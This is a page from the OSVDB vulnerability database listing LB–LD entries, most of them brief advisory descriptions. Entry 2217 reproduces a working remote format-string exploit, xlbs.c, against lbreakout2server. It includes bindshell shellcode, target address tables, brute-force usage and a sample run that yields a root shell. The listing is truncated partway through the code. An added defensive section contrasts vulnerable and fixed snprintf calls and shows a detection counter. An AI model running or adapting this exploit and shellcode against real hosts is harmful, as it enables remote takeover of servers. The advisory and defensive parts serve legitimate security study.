OSVDB ID | Disclosure Date | Title

71057 | 2011-03-10 | Lazyest Gallery Plugin for WordPress /wp-content/plugins/lazyest-gallery/lazyest-popup.php image Parameter XSS
Description: Lazyest Gallery Plugin for WordPress contains a flaw that allows a remote cross-site scripting (XSS) attack. This flaw exists because the application does not validate the 'image' parameter upon submission to the wp-content/plugins/lazyest-gallery/lazyest-popup.php script. This may allow a user to create a specially crafted URL that would execute arbitrary script code in a user's browser within the trust relationship between their browser and the server.

7753 | 2001-10-30 | LB5000 Search.cgi amembernamecookie Cookie Privilege Escalation
Description (provided by CVE): Directory traversal vulnerability in Search.cgi in Leoboard LB5000 LB5000II 1029 and earlier allows remote attackers to overwrite files and gain privileges via .. (dot dot) sequences in the amembernamecookie cookie.

8181 | 2004-07-22 | LBE Web HelpDesk jobedit.asp id Parameter SQL Injection
Description: LBE Web HelpDesk contains a flaw that allows an attacker to inject arbitrary SQL code. The 'id' parameter within jobedit.asp is not verified properly, allowing an attacker to inject or manipulate SQL queries.

33367 | 2007-01-02 | lblog /admin/db/newFolder/ Direct Request Database Disclosure
Description (provided by CVE): lblog stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for a certain file in admin/db/newFolder/.

28036 | 2006-08-20 | LBlog comments.asp id Parameter SQL Injection
Description: LBlog contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the 'comments.asp' script not properly sanitizing user-supplied input to the 'id' variable. This may allow an attacker to inject or manipulate SQL queries in the back-end database.

1584 | 2000-09-28 | LBNL traceroute -g Option Local Overflow
Description (provided by CVE): Heap overflow in savestr function in LBNL traceroute 1.4a5 and earlier allows a local user to execute arbitrary commands via the -g option.

4025 | 2004-02-23 | LBreakout HOME Environment Variable Local Overflow
Description: LBreakout contains a flaw that may allow a malicious local user to escalate their privileges on a vulnerable system. The issue is triggered by a boundary error in the handling of the HOME environment variable. A crafted HOME value may cause a buffer overflow and potentially allow execution of code with group "games" privileges, resulting in a loss of confidentiality, integrity, and/or availability.

16569 | 2002-11-24 | LBreakout Unspecified Input Validation Issues
Description: Unknown / Incomplete

16570 | 2005-05-16 | LBreakout2 Unspecified Buffer Overflow
Description: A local overflow exists in LBreakout2. The issue exists because of a boundary error in the handling of certain environment variables. By supplying a specially crafted environment variable value, a malicious local user can cause a buffer overflow and potentially execute code with group "games" privileges, resulting in a loss of integrity or availability.

2217 | 2003-06-24 | lbreakout2server remote format string exploit.
Description (exploit author's notes, reproduced as posted):

this exploits lbreakout2server[v2-2.5+], the new one. the exploit header explains most of it. i made a function to find the pop/memory location on the server, since this is a bit much work manually: you can only see 1-2 returns at a time, and need to know the server code dealios. the example usage will show that. also, this is not forked. so, if you crash it, you're SOL. (still note, this will NOT work out of the box without the proper address locations. the exploit comments explain how to get these addresses. also, the server will probably not be run as root, or shouldn't be. i just run everything as root when i am testing :/)

-------------------- example usage --------------------

```
[v9@localhost v9]$ cc xlbs.c -o xlbs
[v9@localhost v9]$ ./xlbs -h localhost -g
[*] lbreakout[2-2.5+]: remote format string exploit.
[*] by: vade79/v9 v9@fakehalo.deadpig.org (fakehalo)

NOTE: i did not add the command to disconnect the user. so, you have to wait
roughly a minute before each user (format string placed as a user) times out.
basically, wait a minute in-between using it. also, the packets may or may not
come back in order. (or come back at all)

[*] finding pop value: localhost:8000.
1: (false) 8049b55
2: (false) 80812c0
3: (false) 80860e8
4: (false) 0
5: (false) ffffffff
6: (false) bffffa20
7: (false) 3b238
8: (false) bffffa38
9: (false) 804c906
10: (false) bffffa20
11: (false) 3b491
12: (false) bffffa38
13: (false) 804c950
14: (true) 78787878
[*] the pop value is: 14.
[v9@localhost v9]$ ./xlbs -h localhost -t 1 -P 14 -b
[*] lbreakout[2-2.5+]: remote format string exploit.
[*] by: vade79/v9 v9@fakehalo.deadpig.org (fakehalo)

target=localhost:8000 pops=14 dtors=0x0805b170(+0) ret=0x0807ca88(+0)
[*] sending code buffer. (net_buffer)
[*] sending format string, new .dtors.
[*] attempting to connect: localhost:12800.
[!] connection failed: localhost:12800.
target=localhost:8000 pops=14 dtors=0x0805b170(+4) ret=0x0807ca88(+0)
[*] sending code buffer. (net_buffer)
[*] sending format string, new .dtors.
[*] attempting to connect: localhost:12800.
[!] connection failed: localhost:12800.
target=localhost:8000 pops=14 dtors=0x0805b170(+8) ret=0x0807ca88(+0)
[*] sending code buffer. (net_buffer)
[*] sending format string, new .dtors.
[*] attempting to connect: localhost:12800.
[!] connection failed: localhost:12800.
target=localhost:8000 pops=14 dtors=0x0805b170(+12) ret=0x0807ca88(+0)
[*] sending code buffer. (net_buffer)
[*] sending format string, new .dtors.
[*] attempting to connect: localhost:12800.
[!] connection failed: localhost:12800.
target=localhost:8000 pops=14 dtors=0x0805b170(+16) ret=0x0807ca88(+0)
[*] sending code buffer. (net_buffer)
[*] sending format string, new .dtors.
[*] attempting to connect: localhost:12800.
[!] connection failed: localhost:12800.
target=localhost:8000 pops=14 dtors=0x0805b170(+20) ret=0x0807ca88(+0)
[*] sending code buffer. (net_buffer)
[*] sending format string, new .dtors.
[*] attempting to connect: localhost:12800.
[!] connection failed: localhost:12800.
target=localhost:8000 pops=14 dtors=0x0805b170(+24) ret=0x0807ca88(+0)
[*] sending code buffer. (net_buffer)
[*] sending format string, new .dtors.
[*] attempting to connect: localhost:12800.
[*] successfully connected: localhost:12800.
Linux localhost.localdomain 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknown
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
```

-------------------- exploit: xlbs.c --------------------

```c
/*[ lbreakout[2-2.5+]: remote format string exploit. ]*
 * (only v2-2.5-beta1, or greater versions affected)
 *
 * by: vade79/v9 v9@fakehalo.deadpig.org (fakehalo)
 *
 * lbreakout(2) is a common SDL game included, in at
 * least packaged form for many linux distributions.
 * it can be found on:
 * http://www.freshmeat.net/projects/lbreakout
 * http://lgames.sourceforge.net
 *
 * there exists multiple format string bugs within
 * both the client, and the server. these bugs are
 * in the form of snprintf(buf1,len,buf2);
 *
 * this exploit takes advantage of the initial
 * login request, found in server/server.c:
 * 446:snprintf( name, 20, msg_read_string() );
 * (the size limit(20) does not make a difference)
 *
 * the shellcode is placed in net_buffer(1024), in
 * memory. which is used for all initial udp socket
 * reading, but is not cleared. so, the exploit
 * works like so: send shellcode(1024 bytes). then,
 * send the format string buffer(64 bytes). so, the
 * events look like:
 *
 * first packet:
 * [1024 bytes (nops+shellcode)]
 * second packet:
 * [64 bytes (format string)]
 * so, net_buffer(1024) will look like:
 * [64 bytes][960 bytes (original shellcode)]
 * (only thing the format string buffer overwrites
 * are nops)
 *
 * if you want to add to the platform list, simply
 * do as follows:
 * ./xlbs -h <hostname> -g
 *
 * take the "(true)" pop value given. now you have
 * the pop value to use.
 *
 * then, do: objdump -sj.dtors
 * /path/to/lbreakout2server
 *
 * then, take the address given, and add 4 bytes.
 * now you have the .dtors address to use.
 *
 * then, do: objdump -x /path/to/lbreakout2server |
 * grep net_buffer | grep -v cur_size
 *
 * then, take the address given, and add ~200 bytes.
 * now you have the return address to use. add ~200
 * bytes because it's a shared buffer, and can get
 * overwritten by other users, or yourself. it's
 * not likely for a legit packet to be over ~200
 * bytes. the minimum is +64(FMTSIZE) bytes.
 *
 * i recommend when testing this exploit, using the
 * brute force option. ie: "./xlbs -h host.com -b",
 * or using an offset of 24("-d 6"), for .dtors.
 *
 * also, for when lbreakout2server/lbreakout2 is
 * setgid games. the -D, and -a command line
 * arguments both use the same snprintf() method.
 * which can also be exploited locally.
 ******************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <getopt.h>
#include <signal.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define CODESIZE 1024 /* 1024 = net_buffer size. */
#define FMTSIZE 64    /* format buffer size. */
#define TIMEOUT 10    /* socket timeouts. */

static char x86_exec[]= /* bindshell(12800), netric. */
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x66\xb3\x01\x51"
"\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51\x8d\x0c\x24\xcd"
"\x80\xb3\x02\xb1\x02\x31\xc9\x51\x51\x51\x80\xc1\x32"
"\x66\x51\xb1\x02\x66\x51\x8d\x0c\x24\xb2\x10\x52\x51"
"\x50\x8d\x0c\x24\x89\xc2\x31\xc0\xb0\x66\xcd\x80\xb3"
"\x01\x53\x52\x8d\x0c\x24\x31\xc0\xb0\x66\x80\xc3\x03"
"\xcd\x80\x31\xc0\x50\x50\x52\x8d\x0c\x24\xb3\x05\xb0"
"\x66\xcd\x80\x89\xc3\x31\xc9\x31\xc0\xb0\x3f\xcd\x80"
"\x41\x31\xc0\xb0\x3f\xcd\x80\x41\x31\xc0\xb0\x3f\xcd"
"\x80\x31\xdb\x53\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62"
"\x69\x89\xe3\x8d\x54\x24\x08\x31\xc9\x51\x53\x8d\x0c"
"\x24\x31\xc0\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";

struct platform {
  unsigned int pops;
  unsigned long dtors_addr;
  unsigned long ret_addr;
};
struct platform target[]={
  /* { pops,(.dtors addr+4),(net_buffer addr+200). } */
  /* 2-2.5-beta1 source, on redhat7.1. */
  { 14,(0x805b0ec+4),(0x0807c940+200) },
  /* 2-2.5-beta2 source, on redhat7.1. */
  { 14,(0x805b16c+4),(0x0807c9c0+200) },
  /* put more platforms here. */
  { 0,0,0 }
};
unsigned short pt=0; /* default platform. */

char *send_packet(char *,unsigned short,char *,unsigned int,unsigned short);
char *getfmt(int,int,unsigned int);
char *getcode(void);
void getshell(char *,unsigned short);
void getpops(char *hostname,unsigned short port);
void sendcode(char *,unsigned short,int,int,unsigned int);
void printe(char *,short);
void usage(char *);
void sig_alarm(){printe("alarm signal/timeout",1);}

int main(int argc,char **argv){
  unsigned short port=8000; /* default. */
  unsigned short getpop=0;
  unsigned short brute=0;
  unsigned short crash=0;
  int doffset=0;
  int roffset=0;
  int pops=0;
  int chr=0;
  char *hostname=0;
  while((chr=getopt(argc,argv,"t:h:p:d:r:P:gbc"))!=EOF){
    switch(chr){
      case 't': /* change this if more platforms are added. */
        if(atoi(optarg)<0||atoi(optarg)>1) usage(argv[0]);
        pt=atoi(optarg);
        break;
      case 'h':
        if(!hostname&&!(hostname=(char *)strdup(optarg)))
          printe("main(): allocating memory failed",1);
        break;
      case 'p': port=atoi(optarg); break;
      case 'd': doffset=(atoi(optarg)*4); break;
      case 'r': roffset=atoi(optarg); break;
      case 'P': pops=atoi(optarg); break;
      case 'g': getpop=1; break;
      case 'b': brute=1; break;
      case 'c': crash=1; break;
      default: usage(argv[0]); break;
    }
  }
  if(!hostname) usage(argv[0]);
  printf(
  "[*] lbreakout[2-2.5+]: remote format string exploit"
  ". [*] by: vade79/v9 v9@fakehalo.deadpig.org (fakeh"
  "alo) ");
  if(getpop){
    getpops(hostname,port);
    exit(0);
  }
  else if(crash){ /* this can sometimes help to activate the code. */
    printf("[*] sending server ...
```

[listing truncated in the original]

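The exploit header above rests on two observations: a user-supplied login name is used directly as the format string in `snprintf(name, 20, msg_read_string())`, so the 20-byte output limit does not stop the conversions in that string from being evaluated; and the 64-byte format packet overwrites only the NOP sled at the front of the 1024-byte, never-cleared `net_buffer`, leaving the payload at the end intact. The following is an added example, not part of the OSVDB entry or of xlbs.c: it places the vulnerable `snprintf` pattern beside the fixed constant-format form, counts the conversions an untrusted string would trigger (the check a code reviewer or an IDS rule would apply to a login name), and simulates the two-packet buffer layout. Function names, the payload marker and the sample inputs are constructed for illustration; only the 20/1024/64-byte sizes come from the exploit header.

```c
/* Added example: vulnerable vs. fixed snprintf() and the net_buffer layout.
 * Not from the OSVDB entry or xlbs.c; names and sample data are constructed. */
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define NAME_LEN        20    /* name buffer size quoted from server.c:446 */
#define NET_BUFFER_LEN  1024  /* size of the shared UDP read buffer */
#define FMT_PKT_LEN     64    /* size of the second (format string) packet */

/* Vulnerable pattern: untrusted bytes become the format string. The output
 * limit does not help, because every conversion is parsed and acted on
 * (%x reads stack words, %n writes) regardless of how much output fits.
 * The pragmas silence the compiler warning that normally catches this. */
#pragma GCC diagnostic push
#pragma GCC diagnostic ignored "-Wformat-security"
#pragma GCC diagnostic ignored "-Wformat-nonliteral"
int read_name_vulnerable(char *name, const char *untrusted)
{
    return snprintf(name, NAME_LEN, untrusted);
}
#pragma GCC diagnostic pop

/* Fixed pattern: constant format; the untrusted data is only an argument. */
int read_name_fixed(char *name, const char *untrusted)
{
    return snprintf(name, NAME_LEN, "%s", untrusted);
}

/* Runs one of the readers on a static NAME_LEN buffer and returns the result. */
const char *render(int (*reader)(char *, const char *), const char *untrusted)
{
    static char name[NAME_LEN];
    memset(name, 0, sizeof name);
    reader(name, untrusted);
    return name;
}

/* Counts the '%' conversions an untrusted string would trigger if misused as
 * a format. "%%" is a literal percent and is not counted. A non-zero count in
 * data such as a login name is what a reviewer or detection rule flags. */
int count_conversions(const char *s)
{
    int n = 0;
    for (; *s; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%') {   /* escaped percent: skip both characters */
            s++;
            continue;
        }
        n++;
    }
    return n;
}

/* Simulates the two-packet sequence from the exploit header:
 *   packet 1: NOP sled ending in the payload, filling all of net_buffer
 *   packet 2: 64 bytes of format string written over the front of the same
 *             (uncleared) buffer
 * Returns 1 if every byte between the end of packet 2 and the payload is
 * still a NOP (0x90) and the payload is untouched, i.e. a return address
 * anywhere in that range slides into the payload. The payload here is a
 * constructed marker string, not executable code. */
int net_buffer_layout_intact(void)
{
    static unsigned char net_buffer[NET_BUFFER_LEN];
    static const unsigned char payload[] = "<constructed payload marker>";
    size_t plen = sizeof payload - 1;
    unsigned char fmt_pkt[FMT_PKT_LEN];
    size_t i;

    memset(net_buffer, 0x90, NET_BUFFER_LEN);                 /* packet 1 */
    memcpy(net_buffer + NET_BUFFER_LEN - plen, payload, plen);

    memset(fmt_pkt, 'A', FMT_PKT_LEN);                        /* packet 2 */
    memcpy(net_buffer, fmt_pkt, FMT_PKT_LEN);

    for (i = FMT_PKT_LEN; i < NET_BUFFER_LEN - plen; i++)
        if (net_buffer[i] != 0x90)
            return 0;
    return memcmp(net_buffer + NET_BUFFER_LEN - plen, payload, plen) == 0;
}

int main(void)
{
    printf("vulnerable: \"%s\"\n", render(read_name_vulnerable, "guest%%"));
    printf("fixed:      \"%s\"\n", render(read_name_fixed, "guest%%"));
    printf("conversions in \"%%x%%x%%n\": %d\n", count_conversions("%x%x%n"));
    printf("net_buffer layout intact: %d\n", net_buffer_layout_intact());
    return 0;
}
```

The harmless input `guest%%` is enough to tell the two readers apart: the vulnerable one collapses it to `guest%` because the string was interpreted as a format, while the fixed one stores it verbatim. Real attack strings substitute `%x` and `%n` for the `%%`, which is why `count_conversions` treats any unescaped `%` in a name field as suspicious.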
16587 | 2002-08-02 | Lcc Compile Time Arbitrary Memory Disclosure
Description: Unknown / Incomplete

59899 | 2002-08-02 | LCC-Win32 Import Table Arbitrary Memory Disclosure
Description (provided by CVE): LCC-Win32 3.2 compiler, when running on Windows 95, 98, or ME, writes portions of previously used memory after the import table, which could allow attackers to gain sensitive information. NOTE: it has been reported that this problem is due to the OS and not the application.

5158 | 2004-04-12 | LCDProc parse_all_client_messages() Function Multiple Overflows
Description (provided by CVE): Multiple buffer overflows in LCDProc 0.4.1, and possibly other 0.4.x versions up to 0.4.4, allows remote attackers to execute arbitrary code via (1) a long invalid command to parse_all_client_messages function, or (2) long argv command to test_func_func function.

13654 | 2000-04-20 | LCDproc screen_add Command Remote Overflow
Description (provided by CVE): Buffer overflow in LCDproc allows remote attackers to gain root privileges via the screen_add command.

287 | 2000-01-01 | LCDproc Server Unauthenticated Access
Description: Unknown / Incomplete

5160 | 2004-04-12 | LCDProc test_func_func Format String Command Execution
Description (provided by CVE): Format string vulnerability in test_func_func in LCDProc 0.4.1 and earlier allows remote attackers to execute arbitrary code via format string specifiers in the str variable.

5159 | 2004-04-12 | LCDProc test_func_func Overflow
Description: Unknown / Incomplete

52171 | 2009-02-04 | LCPlayer QT File Handling DoS
Description: Unknown / Incomplete

50860 | 2008-12-04 | lcxBBportal includes/acp/acp_lcxbbportal.php phpbb_root_path Parameter Remote File Inclusion
Description: lcxBBportal contains a flaw that may allow a remote attacker to execute arbitrary commands or code. The issue is due to the 'includes/acp/acp_lcxbbportal.php' script not properly sanitizing user input supplied to the 'phpbb_root_path' parameter. This may allow an attacker to include a file from a third-party remote host that contains commands or code that will be executed by the vulnerable script with the same privileges as the web server.

50859 | 2008-12-04 | lcxBBportal portal/includes/portal_block.php phpbb_root_path Parameter Remote File Inclusion
Description: lcxBBportal contains a flaw that may allow a remote attacker to execute arbitrary commands or code. The issue is due to the 'portal/includes/portal_block.php' script not properly sanitizing user input supplied to the 'phpbb_root_path' parameter. This may allow an attacker to include a file from a third-party remote host that contains commands or code that will be executed by the vulnerable script with the same privileges as the web server.

35457 | 2006-03-01 | LDAP Account Manager (LAM) lamdaemon.pl PATH Subversion Local Privilege Escalation
Description (provided by CVE): Untrusted search path vulnerability in lamdaemon.pl in LDAP Account Manager (LAM) before 1.0.0 allows local users to gain privileges via a modified PATH that points to a malicious rm program.

14635 | 2005-03-09 | LDAP Account Manager (LAM) lamdaemon.pl Unspecified Issue
Description: Unknown / Incomplete

34538 | 2007-03-28 | LDAP Account Manager (LAM) lib/modules.inc LDAP Data Input Filtering Weakness
Description (provided by CVE): lib/modules.inc in LDAP Account Manager (LAM) before 1.3.0 does not escape HTML special characters in LDAP data, which allows remote attackers to have an unknown impact, probably cross-site scripting (XSS).

72098 | 2011-04-28 | LDAP Account Manager templates/login.php selfserviceSaveOk Parameter XSS
Description: LDAP Account Manager contains a flaw that allows a remote cross-site scripting (XSS) attack. This flaw exists because the 'lib/status.inc' script does not validate the 'selfserviceSaveOk' parameter upon submission to the 'templates/login.php' script. This may allow a user to create a specially crafted URL that would execute arbitrary script code in a user's browser within the trust relationship between their browser and the server.

59591 | 2009-10-28 | LDAP Integration Module for Drupal LDAP Server Unspecified CSRF
Description: Unknown / Incomplete

59592 | 2009-10-28 | LDAP Integration Module for Drupal User LDAP Data Access Restriction Bypass
Description: Unknown / Incomplete

59593 | 2009-10-28 | LDAP Integration Module for Drupal User Management Unspecified Access Restriction Bypass
Description: Unknown / Incomplete

59590 | 2009-10-28 | LDAP Integration Module for Drupal User-defined Server Name XSS
Description: Unknown / Incomplete

22828 | 2005-02-16 | ldapdiff ldapdiff.conf Path Construction Unspecified Issue
Description (provided by CVE): Unspecified vulnerability in ldapdiff before 1.1.1 has unknown impact and attack vectors, related to "ldapdiff.conf path construction".

41648 | 2007-10-06 | ldapscripts Process Listing Local User Credentials Disclosure
Description (provided by CVE): ldapscripts 1.4 and 1.7 sends a password as a command line argument when calling some LDAP programs, which might allow local users to read the password by listing the process and its arguments, as demonstrated by a call to ldappasswd in the _changepassword function.